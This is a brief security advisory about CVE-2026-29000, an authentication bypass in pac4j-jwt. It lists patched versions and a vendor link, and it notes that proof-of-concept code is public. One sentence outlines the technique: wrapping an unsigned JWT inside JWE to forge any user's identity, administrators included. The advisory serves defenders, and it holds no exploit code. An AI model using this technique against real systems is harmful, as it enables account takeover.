pac4j-jwt Security Restriction Bypass Vulnerability

Release Date: 9 Mar 2026

RISK: Medium Risk

TYPE: Servers - Web Servers

A vulnerability has been identified in pac4j-jwt. A remote attacker could exploit this vulnerability to trigger security restriction bypass on the targeted system.

 

Note:

Proof of Concept exploit code Is publicly available for CVE-2026-29000. Attackers who possess the server's RSA public key can create a JWE-wrapped PlainJWT with arbitrary subject and role claims, bypassing signature verification to authenticate as any user including administrators. Hence, the risk level is rated as Medium Risk.

---

Impact

• Security Restriction Bypass

---

System / Technologies affected

• If you use the 4.x line: upgrade to 4.5.9 (or newer)
• If you use the 5.x line: upgrade to 5.7.9 (or newer)
• If you use the 6.x line: upgrade to 6.3.3 (or newer)

---

Solutions

Before installation of the software, please visit the vendor web-site for more details.

 

Apply fixes issued by the vendor:

• https://www.pac4j.org/blog/security-advisory-pac4j-jwt-jwtauthenticator.html

---

Vulnerability Identifier

• CVE-2026-29000

---

Source

• pac4j-jwt

---

Related Link

• https://www.pac4j.org/blog/security-advisory-pac4j-jwt-jwtauthenticator.html